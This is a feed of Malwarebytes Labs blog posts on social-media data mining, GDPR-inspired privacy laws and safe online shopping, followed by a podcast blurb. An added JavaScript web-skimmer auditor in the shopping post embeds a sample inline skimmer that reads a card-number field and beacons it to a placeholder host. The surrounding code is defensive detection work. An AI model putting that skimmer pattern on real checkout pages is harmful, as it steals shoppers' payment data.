Malware Bytes

How social media platforms mine personal data for profit

Malware Bytes Security - Fri, 04/03/2020 - 2:42pm

It’s almost impossible not to rely on social networks in some way, whether for personal reasons or business. Sites such as LinkedIn continue to blur the line, adding more social features over time that resemble those of less formal sites such as Facebook. Can anyone imagine not relying on, of all things, Twitter to catch up instantly on breaking coronavirus news from around the world? The trade-off is your data, and how the platforms profit from it.

Like it or not—and it’s entirely possible it’s a big slab of “not”—these services are here to stay, and we may be “forced” to keep using them. Some of the privacy concerns that lead people to say, “Just stop using them” are well founded. The reality, however, is not quite so straightforward.

For example, in many remote regions, Facebook or Twitter might be the only free Internet access people have. And with pockets of restriction on free press, social media often represents the only outlet for “truth” for some users. There are some areas where people can receive unlimited Facebook access when they top up their mobiles. If they’re working, they’ll almost always use Facebook Messenger or another social media chat tool to stay in touch rather than drain their SMS allowance.

Many of us can afford to walk away from these services; but just as many of us simply can’t consider it when there’s nothing else to take its place.

Mining for data (money) has never been so profitable.

But how did this come to be? In the early days of Facebook, it was hard to envision the platform being used to spread disinformation, assist in genocide, or sell user data to third parties. We walk users through the social media business model and show how the inevitable happens: when a product is free, the commodity is you and your data.

Setting up social media shop

Often, venture capital backing is how a social network springs into life. This is where VC firms invest lots of money in promising-looking services or technology with the expectation that they’ll make big money and gain a return on investment in the form of ownership stakes. When the company is bought out or goes public, it’s massive sacks of cash for everybody. (Well, that’s the dream. The reality is usually quite a bit more complicated.)

It’s not exactly common for these high-risk gambles to pay off, and what often happens is the company never quite pops. They underperform, or key staff leave, and they expand a little too rapidly with the knock-on effect that the CEO suddenly has this massive service with millions of users and no sensible way to turn that user base into profit (and no way to retain order on a service rife with chaos).

At that point, they either muddle along, or they look to profit in other ways. That “other way” is almost always via user data. I mean, it’s all there, so why not? Here are just some of the methods social networks deploy to turn bums on seats into massive piles of cash.

Advertising on social media

This is the most obvious one, and a primary driver of online revenue for many a year. Social media platforms benefit in a way more traditional publishers cannot, and their per-user revenue streams appear to be quite healthy.

Advertising is a straightforward way for social media networks not only to make money from the data they’ve collected, but also to create chains where external parties potentially dip into the same pool, too.

At its most basic, platforms can offer ad space to advertisers. Unlike traditional publishing, social media ads can be tailored to personalized data the social network sees you searching for, talking about, or liking daily. If you thought hitting “like” (or its equivalent) on a portal was simply a helpful thumbs up in the general direction of someone providing content, think again. It’s quite likely feeding data into the big pot of “These are the ads we should show this person.” 

Not only is everything you punch into the social network (and your browser) up for grabs, but everything your colleagues and associates do too, tying you up in a neat little bow of social media profiling. All of it can then be mined to make associations and estimations, which will also feed back to ad units and, ultimately, profit.

Guesstimates are based on the interests of you, your family, your friends, and your friends’ friends, plus other demographic-specific clues, such as your job title, pictures of your home, travel experiences, cars, and marriage status. Likely all of these data points help the social network neatly estimate your income, another way to figure out which specific adverts to send your way.

After all, if they send you the wrong ads, they lose. If you’re not clicking through and popping a promo page, the advertisers aren’t really winning. All that ad investment is essentially going to waste unless you’re compelled to make use of it in some way.

Even selling your data to advertisers or other marketing firms could be on the table. Depending on terms of service, it’s entirely possible the social platforms you use can anonymise their treasure trove and sell it for top dollar to third parties. Even in cases where the data isn’t sold, simply having it out there is always a bit risky.

There have been many unrelated, non-social media instances where it turned out supposedly anonymous data wasn’t. There are always people who can come along afterwards and piece it all together, and they don’t have to be Sherlock Holmes to do it. And that’s before you consider that social media sites, and platforms with social components, aren’t immune to the perils of theft, leakage, and data scraping.

As any cursory glance at a security news source will tell you, there’s an awful lot of rogue advertisers out there to offset the perfectly legitimate ones. Whether by purchase or by stumbling upon data leaked online, scammers are happy to take social media data and tie it up in email/phone scams and additional fake promos. At that point, even data generated through theoretically legitimate means is being (mis)used in some way by unscrupulous individuals, which only harms the ad industry further.

Apps and ads

Moving from desktop to mobile is a smart move for social networks, and if they’re able to have you install an app, then so much the better (for them). Depending on the mobile platform, they may be able to glean additional information about sites, apps, services, and preferred functionalities, which wouldn’t necessarily be available if you simply used a mobile web browser.

If you browse for any length of time on a mobile device, you’ll almost certainly be familiar with endless pop-ups and push notifications telling you how much cooler and awesome the app version of site X or Y will be. You may also have experienced the nagging sensation that websites seem to degrade in functionality over time on mobile browsers.

Suddenly, the UI is a little worse. The text is tiny. Somehow, you can no longer find previously overt menu options. Certain types of content no longer display correctly or easily, even when it’s something as basic as a jpeg. Did the “Do you want to view this in the app?” popup reverse the positions of the “Yes” and “No” buttons from the last time you saw it? Are they trying to trick you into clicking the wrong thing? It’s hard to remember, isn’t it?

A cynic would say this is all par for the course, but this is something you’ve almost certainly experienced when trying to do anything in social land on a mobile minus an app.

Once you’re locked into said app, a brave new world appears in terms of intimately-detailed data collection and a huge selection of adverts to choose from. Some of them may lead to sponsored affiliate links, opening the data harvesting net still further, or lead to additional third-party downloads. Some of these may be on official platform stores, while others may sit on unofficial third-party websites with all the implied risk such a thing carries.

Even the way apps work on the website proper can drive revenue. Facebook caught some heat back in 2008 for its $375 USD developer fee. Simply having a mass of developers making apps for the platform—whether verified or not—generates data that a social network platform can make use of, then tie back to its users.

It’s all your data, wheeling around in a tumble drier of analytics.

Payment for access/features

Gating access to websites behind paywalls is not particularly popular with the general public. Therefore, most sites with a social networking component will usually charge only for additional services, and those services might not even be directly related to the social networking bit.

LinkedIn is a great example of this: the social networking part is there for anybody to use because it makes all those hilariously bad road warrior lifestyle posts incredibly sticky, and humorous replies are often the way people first land on a profile proper. However, what you’re paying for is increased core functionality unrelated to the “Is this even real?” comedy posts elsewhere.

In social networking land, some platforms took a login-gated rather than payment-gated approach. Orkut, for example, required a login to access any content. Some of the thinking there was that a gated community could keep the bad things out. In reality, when data theft worms started to spread, it just meant the attacks were contained within the walls and hit the gated communities with full force.

The knock-on effect of this was that security researchers’ ability to analyse and tackle these threats was delayed, because many of these services were either niche or specific to certain regions. As a result, finding out about these attacks was often at the mercy of simply being informed by random people that “X was happening over in Y.”

These days, access is much more granular, and it’s up to users to display what they want, with additional content requiring you to be logged in to view.

Counting the cost

Of the three approaches listed above, payment/gating is one of the least popular techniques to encourage a revenue stream. Straight up traditional advertising isn’t as fancy as app/site/service integration, but it’s something pretty much anybody can use, which is handy for devs without the mobile know-how or funds available to help make it happen.

Even so, nothing quite compares to the flexibility provided by mobile apps, integrated advertising, and the potential for additional third-party installs. With the added boost to sticky installs via the pulling power of social media influencers, it’s possibly never been harder to resist clicking install for key demographics.

The most important question, then, turns out to be one of the most common: What are you getting in return for loading an app onto your phone?

It’s always been true for apps generally, and it’ll continue to be a key factor in social media mobile data mining for the foreseeable future. “You are the product” might be a bit long in the tooth at this point, but where social media is concerned, it’s absolutely accurate. How could the billions of people worldwide creating the entirety of the content posted be anything else?

The post How social media platforms mine personal data for profit appeared first on Malwarebytes Labs.

GDPR: An impact around the world

Malware Bytes Security - Wed, 04/01/2020 - 3:19pm

A little more than one month after the European Union’s General Data Protection Regulation (GDPR) came into effect, extending new data privacy rights to its people, the governor of California signed a separate, sweeping data protection law that borrowed several ideas from GDPR, lighting a torch for a legislative data privacy trend that has now spanned at least 10 countries.

In Chile, lawmakers are updating decades-old legislation to guarantee that their constitutional data protections include the rights to request, modify, and delete personal data. In Argentina, legislators are updating a set of data privacy protections that already granted the country a “whitelist” status, allowing it to more seamlessly transfer data to the European Union. In Brazil, the president signed a data protection law that comes into effect this August that creates a GDPR-like framework, setting up rules for data “controllers” and “owners,” and installing a data protection authority to regulate and review potential violations.

Beyond South America, India is mulling a new law that would restrict how international companies use personal data, but the law includes a massive loophole for government agencies. Canada passed its first national data breach notification law, and in the United States, multiple state and federal bills have borrowed liberally from GDPR’s ideas to extend the rights of data access, deletion, and portability to the public.

GDPR came into effect two years ago, and its impact is clear: Data privacy is the law of the land, and many lands look to GDPR for inspiration.

Amy de La Lama, a partner at Baker McKenzie who focuses her legal practice on global privacy, data security, and cybersecurity, said the world is undergoing major shifts in data privacy, and that GDPR helped spur much of the current conversations.

“At a high level, there’s a huge amount of movement in the privacy world,” de La Lama said, “and, without a doubt, the GDPR has been a huge driver.”

The following laws and bills are a sample of the many global efforts to bring data privacy home. Often, the newer laws and legislation are influenced by GDPR, but several countries that passed data privacy laws before GDPR are still working to update their own rules to integrate with the EU.

This is GDPR around the world.

South America

Several countries in South America already grant stronger data protection rights to their public than the United States does, with several enshrining a right to data protection in their constitutions.

In 2018, Chile joined that latter club, supplementing its older, constitutional right to privacy with a new right to data protection. The constitution now says:

“The Constitution ensures to every person: … The respect and protection of private life and the honor of the person and his family, and furthermore, the protection of personal data. The treatment and protection of this data will be put into effect in the form and conditions determined by law.”

That last reference to “conditions determined by law” matters deeply to Chileans’ actual data protection rights because even though the Constitution protects data, it does not specify how that data should be protected.

Think of it like the US Constitution, which, for instance, protects US persons against unreasonable searches. Only within the past few decades, however, have courts and lawmakers interpreted whether “unreasonable searches” include, for instance, searches of emails sent through a third-party provider, or searches of historical GPS data tracked by a mobile phone.

Now, Chile is working to determine what its data protection rights will actually include, with a push to repeal and replace a decades-old data protection law called the “Personal Data Protection Act,” or Act No. 19.628. The latest legislative efforts include a push to include the rights to request, modify, and delete personal data, along with the right to withdraw consent from how a company collects, stores, writes, organizes, extracts, transfers, and transmits personal data.

Revamping older data protections is not unique to Chile.

Argentina implemented its Personal Data Protection Law (PDPL) in 2000. That law, unlike Chile’s current efforts, drew inspiration from the European Union long before the passage of GDPR: Argentina’s lawmakers aligned their legislation with the law that GDPR repealed and replaced, the Data Protection Directive of 1995.

This close relationship between Argentinian and European data protection law made Argentina a near shoo-in for the GDPR’s so-called “whitelist,” a list of countries outside the European Union that have been approved for easier cross-border data transfers because of those countries’ “adequate level of data protection.” This status can prove vital for countless companies that move data all around the world.

According to the European Commission, countries that currently enjoy this status include Andorra, Argentina, Canada (for commercial organizations), the Faroe Islands, Guernsey, Israel, Isle of Man, Japan, Jersey, New Zealand, Switzerland, and Uruguay. The US is also included, so long as data transfers happen under the limited Privacy Shield framework—an agreement that replaced the previous, separate data transfer agreement called “Safe Harbor,” which itself was found invalid by the Court of Justice of the European Union.

(Privacy Shield also faces challenges of its own, so maybe the US should not get too comfortable with its status.)

Despite Argentina’s current whitelist status with the European Commission, the country is still trying to update its data protection framework with a new piece of legislation.

The new bill, Bill No. MEN-2018-147-APN-PTE, was introduced to Argentina’s Congress in September 2018. Its proposed changes include allowing the processing of sensitive data with approved consent from a person, expanding the territorial reach of personal data protections, creating new rules for when to report data breaches to the country’s data regulator, and drastically increasing the sanctions for violating the law.

Within South America, there is still at least one more country influenced by GDPR.

In August 2018, Brazil’s then-president Michel Temer signed the country’s General Data Protection Law (“Lei Geral de Proteção de Dados Pessoais” or LGPD). The law comes into effect August 2020.

The similarities to GDPR are many, de La Lama said.

“Like the GDPR, the new law, when it comes into effect, applies extraterritorially, contains notice and consent and cross-border transfer requirements as well as obligations with regard to data subject rights and data protection officer appointment,” de La Lama said. “EU Standard Contractual clauses may be recognized under the new law but this step has not yet been taken.”

The LGPD defines “sensitive data” as personal data that reveals racial or ethnic origin, political opinions, religious or philosophical beliefs, and trade union membership, along with genetic data, biometric data used for uniquely identifying a natural person, health and medical information, and data concerning a person’s sex life or sexual orientation.

Similar to GDPR, Brazil’s LGPD also creates a distinction between data controllers or owners, and data processors, a framework that has quickly rolled out in proposed laws around the world, including the United States. Brazil’s LGPD also applies beyond the country’s borders. The law applies to companies and organizations that offer goods or services to those living within Brazil, much like how GDPR applies to companies that direct marketing towards those living inside the European Union.

The law also, following amendments, includes the creation of the Brazilian Data Protection Authority. That body will have the sole authority to issue regulations and sanctions for organizations that violate the law because of a data breach.  

India

In late 2019, India’s lawmakers introduced a data protection bill two years in the making, which bears some similarities to the EU’s GDPR. The Personal Data Protection Bill of 2019, or PDPB, would require international companies to seek the consent of India’s public for many uses of personal data, and grant the people a new right to have their data erased.

The similarities stop there.

While portions of the bill mimic the main purpose of GDPR, the data protections actually included suffer from an enormous loophole. As written, the bill’s data restrictions do apply to government agencies, but the bill also lets the central government exempt any agency it chooses.

The bill would permit New Delhi to “exempt any agency of government from application of Act in the interest of sovereignty and integrity of India, the security of the state, friendly relations with foreign states, public order,” according to an early, leaked draft of the bill obtained by TechCrunch.

This exceptionally broad language is akin to any loophole in the United States that applies to “national security,” and it is one that digital rights activists in India are fighting.

“This is particularly concerning in India given that the government is the largest collector of data,” said Apar Gupta, executive director of the Internet Freedom Foundation, in talking to the New York Times.

Salman Waris, who leads the technology practice at the New Delhi law firm TechLegis, also told the New York Times that the new Indian law purports to protect the public while actually accomplishing something else.

“It gives a semblance of owning your data, and having the right to know how it is used, to the individual,” Waris said, “but at the same time it provides carte blanche to the government.”

GDPR in the United States

Though we’ve focused on GDPR’s impact on a global scale, it is impossible to deny the influence felt at home in the United States.

While Congress’s efforts to pass a comprehensive data privacy law date back to the Cambridge Analytica scandal of 2018, some of the ideas embedded in more current data privacy legislation relate directly to GDPR.

One clear example is the California Consumer Privacy Act (CCPA), said Sarah Bruno, partner at Reed Smith who works at the intersection of intellectual property, privacy, and advertising. Though the law was signed only about a month after GDPR took effect in the EU, it was drafted with more than enough time to borrow from GDPR, which had been approved two years earlier, in 2016.

“GDPR did have an impact on CCPA,” Bruno said, “and it has a lot of components in CCPA.”

CCPA grants Californians the rights to access and delete data, the right to take their data and port it to a separate provider, along with the right to know what data about them is being collected. Californians also enjoy the explicit right to opt out of having their data sold, which is not verbatim included in GDPR, though that law does give residents protections that could result in a similar outcome. And though CCPA does not grant rights to “data subjects,” as written in GDPR, it does have a similar scope of effect. Much of the law is about giving consumers access to their own information.

“Consumers are able to write to a company, similar to GDPR, to find out what information [the company] is collecting on them, via cookies, about their purchase history, what they’re looking at on websites when on there,” Bruno said. She added that CCPA contends that “all that information, a California consumer should have access to that, and that’s new in the US, but similar to GDPR.”

But California is just one state inspired by GDPR. There’s also Washington, which, earlier this year, introduced a remodeled version of its Washington Privacy Act.

“It’s similar as well to CCPA,” Bruno said about Washington’s revamped bill. “As I call it, CCPA plus.”

The Washington Privacy Act scores close to GDPR, in that it borrows some of the EU law’s language on data “controllers” and “processors,” which would both receive new restrictions on how personal data is collected and shared. The bill, much like GDPR, would also provide Washingtonians with the rights to access, control, delete, and port their data. Much like CCPA, it would also let residents specifically opt out of data sales.

Though the bill initially drew a warm welcome from Microsoft and the Future of Privacy Forum, shortly after, Electronic Frontier Foundation opposed the legislation, calling it a “weak, token effort at reining in corporations’ rampant misuse of personal data.”

The bill, introduced on January 13 this year, has not moved forward.

GDPR’s legacy: Fines or fatigue?

GDPR’s passage came with a clear warning sign to potential violators—break the law and face fines of up to 4 percent of global annual turnover for the most serious violations, or 2 percent for lesser ones. For an Internet conglomerate like Alphabet, which owns Google, such an enforcement action would mean paying more than a billion dollars. The same is true for Apple, Facebook, Amazon, Verizon, and AT&T, just to name a few.

Despite having the tools to hand down billion-dollar penalties, authorities across Europe were initially shy to use them. In early January 2019, France’s National Data Protection Commission (CNIL) slapped a €50 million penalty on Google after investigators found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.” It was the largest GDPR penalty at the time, but it paled in comparison to what GDPR allowed: even at the lower 2 percent tier, based on Alphabet’s 2018 revenue, the cap would have been about €2.47 billion, or $2.72 billion in today’s dollars.

Six months later, regulators leaned more heavily into their powers. In July 2019, the Information Commissioner’s Office for the United Kingdom (which was at the time still a member of the European Union) announced its intention to fine British Airways $230 million over an earlier data breach that affected 500,000 customers. The proposed penalty represented about 1.5 percent of the airline’s annual worldwide turnover.

But regulatory fines tell just one side of GDPR’s story, because, as de La Lama said, after the law’s passage, her clients tell her of fatigue in trying to comply with every new law.

The nuances between each country’s data protection laws have produced guide after guide from multiple global law firms, each attacking the topic with its own enormous tome of information. De La Lama’s own law firm, Baker McKenzie, released its annual global data protection guide last year, clocking in at 886 pages. A quick glance reveals the subtle but important differences between the world’s laws: countries that adopt a framework separating data restrictions between “controllers” and “processors,” countries that protect “consumers” versus “data subjects,” countries that require data breaches to be reported to data protection authorities, countries that create data protection authorities, and countries that differ on just what the hell personal information includes.

Complying with one data protection law can be hard enough, de La Lama said, and there is little assurance that the current data privacy movement is coming to a close.

“There’s difficulty in trying to bring a company into compliance with a wide variety of privacy and technical specifications and finding internal resources to do that is a daunting task,” de La Lama said. “And when you’re trying to replicate that across multiple jurisdictions, we’re seeing a lot of companies just trying to wrap their arms around how to do that, knowing that GDPR isn’t the end game, but really just the start.”

The post GDPR: An impact around the world appeared first on Malwarebytes Labs.

Important tips for safe online shopping post COVID-19

Malware Bytes Security - Tue, 03/31/2020 - 2:57pm

As more and more countries order their citizens inside in response to COVID-19, online shopping—already a widespread practice—has surged in popularity, especially for practical items like hand sanitizer, groceries, and cleaning products. When people don’t feel safe outside, it’s only natural they’d prefer to shop as much as possible from the safety of their own homes. Unfortunately, you can bet your last toilet paper roll that cybercriminals anticipated the rush and were ready to take advantage of our need to buy supplies of all kinds online.

Because we know how cybercriminals think and have already seen an uptick in web skimmers and coronavirus scams, we wanted to prepare our readers for a safer online shopping experience. We have rounded up some tips for staying secure, as well as some landmines to avoid during your online shopping spree.

Dangers to avoid while shopping online

There are a few dangers that always lurk for online shoppers, and some of them increase in severity during particular events, such as holidays or summer travel season, known shopping periods like Cyber Monday or Singles’ Day, or tragic incidents, including natural disasters and the current global pandemic. Here are a few red flags to watch out for:

Raised prices

It’s only natural to expect a small rise in prices as some companies cope with the economic fallout from closing brick-and-mortar shops and a lack of personnel. Combine that with an increase in demand for specific items, plus the increased cost of delivery to compensate for added danger, and the totals at checkout are probably creeping up all over the place. But it’s one thing to raise prices responsibly. It’s quite another to price gouge, and cybercriminals and scammers are opting for the latter to profit from misfortune.

During times like these, it’s easy to click “purchase” on the first webpage peddling scarce or highly sought-after commodities. For example, two brothers tried to make a fortune selling hand sanitizer for $70 per bottle. People were desperate enough to buy before the attorney general shut down the site. But don’t fall for the hype. Take a deep breath and research an item before jumping at the first opportunity to purchase.

Pro tip: If a price seems wildly out of line, open up a new tab on your browser and search the item name and pricing. You can also check sites such as Tom’s Guide or Consumer Reports for fair prices.

Delays in delivery time

If items are scarce, there may be a long waiting time before delivery. Know your rights in case a supplier can’t deliver within the agreed time frame, and don’t fall for scammers promising they can help you cut the line. Usually, you can claim a refund if the article doesn’t arrive by the date you were promised. But a scammer couldn’t care less about your claims for a refund. They will make sure they are nowhere to be found when the claims come in and the going gets rough.

Pro tip: Search a website’s customer service page to find out delivery and return policies before purchasing, especially for items in short supply. Typically, these policies are found on shipping, support, help, or FAQ webpages.

Counterfeit goods

Selling counterfeit goods is another common type of web crime that will likely see an uptick during the coronavirus pandemic. From a photograph it is nearly impossible to tell whether an item is faux or the real deal. For all we know, the scammer could put a picture of the original on their site and ship you a cheap replica—or nothing at all. A good rule of thumb: if it seems too good to be true, it usually is.

Pro tip: Check the reviews of the seller, reseller, and product—not just on the site, but in a separate search. If someone has been duped before, chances are, they’ll post pictures or a review.

Web skimmers

Ever since shelter-in-place orders sent millions of shoppers online, the Malwarebytes threat intelligence team has noticed an uptick in the number of digital credit card skimmers, also known as web skimmers. Web skimmers are malicious scripts placed on shopping cart or checkout pages; they collect the payment data customers enter when they purchase an item online and send it to a server the attacker controls, while the legitimate order still goes through.

Cybercriminals can hack the websites of legitimate brands to insert web skimmers, so avoiding resellers or little-known boutiques won’t protect shoppers from them. Instead, consider using an antivirus with web protection or browser extensions that block malicious content.
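The advice above is for shoppers. For whoever runs the shop, the same facts translate into a concrete check, shown here as an added example that is not code from the Malwarebytes post. It audits a checkout page offline: external scripts loaded from hosts that are not on the shop’s allow-list are reported, inline scripts that both read a payment field and use a way to send data off the page are reported, and a matching Content-Security-Policy header is generated so the browser refuses such scripts and beacons outright. The HTML, the shop origin and every hostname in it are constructed for the demonstration.

```javascript
// Added example, not code from the Malwarebytes post. Audits a checkout page's
// <script> tags against an allow-list of hosts and builds the CSP that would
// enforce that allow-list in the browser. All names below are assumptions.

const SITE_ORIGIN = "https://shop.example"; // assumed shop origin
const ALLOWED_HOSTS = ["pay-gateway.example", "cdn.example"]; // assumed legitimate third parties

// Constructed checkout page: one first-party script, two expected third
// parties, one injected loader on an unknown host, and one inline hook of the
// kind a form-grabbing skimmer uses (reads the card field, beacons it out).
const SAMPLE_CHECKOUT_HTML = `
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://pay-gateway.example/v3/"></script>
<script src="https://cdn.example/jquery.min.js"></script>
<script src="https://stats-collect.example.net/lib.js"></script>
<script>
  document.querySelector('form#payment').addEventListener('submit', function () {
    var cc = document.querySelector('input[name=cc_number]').value;
    new Image().src = 'https://stats-collect.example.net/i.gif?d=' + btoa(cc);
  });
</script>
</head><body><form id="payment"><input name="cc_number"></form></body></html>`;

// Pull every <script> out of the markup: external ones by src, inline ones by body.
function extractScripts(html) {
  const scripts = { external: [], inline: [] };
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    if (srcMatch) scripts.external.push(srcMatch[1]);
    else if (m[2].trim()) scripts.inline.push(m[2].trim());
  }
  return scripts;
}

// Heuristic for inline code: it names a payment field AND uses a primitive
// that sends data off the page. Either alone is common in legitimate code;
// together they are the signature of a skimmer and deserve a human look.
const PAYMENT_FIELD_RE = /\b(cc_?number|card(number|_number)?|cvv|cvc|expir)/i;
const EXFIL_RE = /\b(new Image\(|fetch\(|XMLHttpRequest|sendBeacon\(|btoa\(|WebSocket\()/;

function auditCheckoutPage(html, siteOrigin, allowedHosts) {
  const { external, inline } = extractScripts(html);
  const siteHost = new URL(siteOrigin).hostname;
  const allowed = new Set([siteHost, ...allowedHosts]);
  const unknownHosts = [];
  for (const src of external) {
    const host = new URL(src, siteOrigin).hostname; // relative src resolves to the shop itself
    if (!allowed.has(host) && !unknownHosts.includes(host)) unknownHosts.push(host);
  }
  const suspiciousInline = inline.filter(
    (code) => PAYMENT_FIELD_RE.test(code) && EXFIL_RE.test(code)
  );
  return { unknownHosts, suspiciousInline };
}

// The preventive control: a CSP that only lets code load from, and data flow
// to, the hosts the shop actually uses. An injected loader on another host is
// then blocked by the browser, and so is the Image beacon carrying card data.
function buildCsp(allowedHosts) {
  const sources = ["'self'", ...allowedHosts.map((h) => `https://${h}`)].join(" ");
  return `default-src 'self'; script-src ${sources}; connect-src ${sources}; img-src ${sources}`;
}

console.log(auditCheckoutPage(SAMPLE_CHECKOUT_HTML, SITE_ORIGIN, ALLOWED_HOSTS));
console.log(buildCsp(ALLOWED_HOSTS));
```

Run against the constructed page, the audit reports stats-collect.example.net as an unknown script host and flags the inline submit handler. The regex-based tag extraction is enough for a static audit of saved HTML; skimmers that are loaded dynamically at runtime only show up when the page is rendered, which is why the CSP, enforced by the browser at load time, is the control that actually stops them rather than the audit.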

Jérôme Segura, Malwarebytes Director of Threat Intelligence, is an internationally renowned expert on web skimmers. He was kind enough to share some of his knowledge with us:

“The vast majority of people, including those familiar with computers, would not be able to see that an online merchant has been hacked and that a skimmer is going to harvest their information.

But there are certain things you can do to minimize risks. For example, check that the site looks up to date by looking at things such as copyright information. If it says something like Copyright 2015, this may be an indication that the site owner is not paying attention to details.

I also believe it’s essential to use some kind of web protection. Based on our telemetry, we stop hundreds of attempts to steal credit card data on a daily basis by blocking malicious domains and IP addresses associated with web skimming infrastructure.”

Pro tip: Keep an eye on your bank account for unexpected payments, and know what to do when your information has been stolen.

Recommended reading: How to protect your data from Magecart and other e-commerce attacks

Precautions and possible pitfalls

While not outright dangers, there are a few somewhat shady behaviors that could signal further trouble down the road. Here are a few you might want to avoid or take into account when you consider online shopping.

Security certificates

The padlock in the address bar only tells you that your connection to the site is encrypted with TLS; it says nothing about who operates the site or whether they will deliver. As we have mentioned before on the blog, the padlock alone does not guarantee a safe site. Domain-validated certificates are issued free of charge to anyone who controls a domain name, so a freshly registered scam site can show the same padlock as a long-established shop. Treat the padlock as a minimum requirement before entering payment details, not as evidence of legitimacy.

Use trusted sites and visit them directly, rather than through a search result or an ad. Sticking to legitimate sites with a good reputation has obvious advantages: you know it’s a real shop, and they deliver on what they promise.

Pro tip: Bookmark favorite URLs to save on manually typing. By saving the URL rather than searching for a shop name, you are less likely to be fooled by impersonators.
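As an added example that is not part of the original post, here is a small Python check of the kind a bookmark sidesteps: it compares the host a link really points at with a list of shops you trust, and flags the usual impersonation tricks (a trusted name buried inside a longer domain, a `trusted.com@evil.test` userinfo prefix, or a punycode label hiding a homoglyph). The trusted-shop list and the sample links are constructed for illustration; `.test` and `.invalid` are reserved names that never resolve.

```python
"""Tell a bookmarked shop's address apart from an impersonator's.

Added example, not code from the original post. The trusted-shop list and
the links in the demo are constructed; '.test' and '.invalid' are reserved
names that never resolve.
"""
from urllib.parse import SplitResult, urlsplit

# Constructed allow-list: the domains of shops you have bookmarked.
TRUSTED_SHOPS = {"example-shop.com", "tupperware.com"}


def _split(url: str) -> SplitResult:
    """Parse a link, treating scheme-less text like 'shop.example/x' as https."""
    url = url.strip()
    if "://" not in url:
        url = "https://" + url
    return urlsplit(url)


def real_host(url: str) -> str:
    """Return the host a browser would actually connect to, lower-cased.

    urlsplit() drops userinfo, port and path, so 'https://tupperware.com@evil.test/'
    yields 'evil.test'. A leading 'www.' is removed so it compares equal to the
    bare domain.
    """
    host = (_split(url).hostname or "").rstrip(".")
    return host[4:] if host.startswith("www.") else host


def verdict(url: str) -> str:
    """Classify a link against TRUSTED_SHOPS.

    'trusted'   host is a trusted domain or a subdomain of one
    'lookalike' host merely contains a trusted name, the link carries
                userinfo ('trusted.com@evil.test'), or a label is punycode
                (xn--), which can hide a homoglyph of a trusted name
    'unknown'   anything else
    """
    host = real_host(url)
    if not host:
        return "unknown"
    if any(host == shop or host.endswith("." + shop) for shop in TRUSTED_SHOPS):
        return "trusted"
    if _split(url).username is not None:
        return "lookalike"          # 'tupperware.com@evil.test' style links
    if any(label.startswith("xn--") for label in host.split(".")):
        return "lookalike"          # IDN host; inspect before trusting it
    if any(shop.split(".")[0] in host for shop in TRUSTED_SHOPS):
        return "lookalike"          # 'tupperware.com.evil.test', 'tupperware-com.test'
    return "unknown"


if __name__ == "__main__":
    for link in ("https://www.Tupperware.com/checkout",
                 "es.tupperware.com",
                 "https://tupperware.com.evil.test/pay",
                 "https://tupperware.com@evil.test/",
                 "https://xn--tpperware-7za.com/",
                 "https://www.example.com/"):
        print(f"{verdict(link):9s} {link}  (host: {real_host(link)})")
```

The point of `real_host` is that everything before an `@`, and everything after the first `/`, is not the host, which is exactly what a lookalike link relies on you misreading; a bookmark stores the parsed host once, so you never have to read it again.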

Targeted ads

Targeted advertising should not be rewarded, and it is usually better to ignore it, for much the same reasons as above: a link in an ad can lead anywhere, so visit the site directly instead of clicking a link in your Facebook feed. Many shops use tracking cookies for targeted advertising, so they will soon pick up that you are looking for a certain item and try to lure you to the site by offering it in your timeline.

Pro tip: Consider buyer protection or insurance for high-value purchases. It lets you recover your money if the item never arrives, or is damaged or otherwise not as described. This does not have to cost anything: PayPal’s buyer protection and the chargeback rights attached to many credit cards give you this cover free of charge.

Information overload

Be wary of web shops asking you for information they don’t need in order to serve you. They might be up to no good. And even if they are not, they have no business asking for details that are unnecessary for the shopping and delivery process. Even if they do not plan to sell your data to third parties, they may suffer a breach and spill your personal information anyway.

Pro tip: Only fill in required sections of any data forms for an online purchase. And if a form starts asking for social security numbers, pet’s names, or other weirdly personal information, do not enter the content and back out of the purchase.

Recommended reading: 10 tips for safe online shopping on Cyber Monday

Preventative measures

As always, it’s important to take the normal security precautions while shopping online. These include the following:

  • Use up-to-date software, especially your operating system and your browser. Check that both are updated before you venture online.
  • Disregard overly aggressive pop-ups, push notifications, and other annoying cries for attention. Usually, unsolicited advice in the form of persistent advertisements, browser extension downloads, coupon programs, and other assorted spam are aiming for trickery and not actually trying to help.
  • Pay extra attention when using public Wi-Fi, and avoid making payments while you are on unprotected Wi-Fi.
  • Where possible, use a VPN during online shopping. A VPN encrypts the traffic between your device and the VPN provider’s server, which keeps others on the same Wi-Fi network from seeing where you shop; the leg from the VPN server to the shop still relies on the site’s own TLS, so the padlock matters as much as ever.

Stay safe, everyone!

The post Important tips for safe online shopping post COVID-19 appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa

Malware Bytes Security - Mon, 03/30/2020 - 12:33pm

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Adam Kujawa, a director of Malwarebytes Labs, about the state of data privacy today, including how users and businesses can protect sensitive information when there are few laws to help them out, and whether we could foresee the many problems with today’s rampant data sharing when we first built the Internet.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research, plus other cybersecurity news:
  • Housing association spills data: A “please update your details” missive has horrible data exposure consequences for a UK-based organization. (Source: The Register)
  • The age-old problem of password reuse: Shockingly, it’s a problem for Fortune 500 companies, too. (Source: Help Net Security)
  • Homework equals router mayhem: With many worldwide retreating to their home environment, it figures that hackers would follow them there. (Source: Cyberscoop)
  • Compromised news sites lead to malware: A variety of backdoor files are offered up by hijacked news portals. (Source: Bleeping Computer)
  • Netflix and phish: The increase in work-from-home employees is also giving rise to a bump in attacks on streaming services. (Source: RapidTV News)

Stay safe, everyone!

The post Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa appeared first on Malwarebytes Labs.


Coronavirus Bitcoin scam promises “millions” working from home

Malware Bytes Security - Thu, 03/26/2020 - 1:05pm

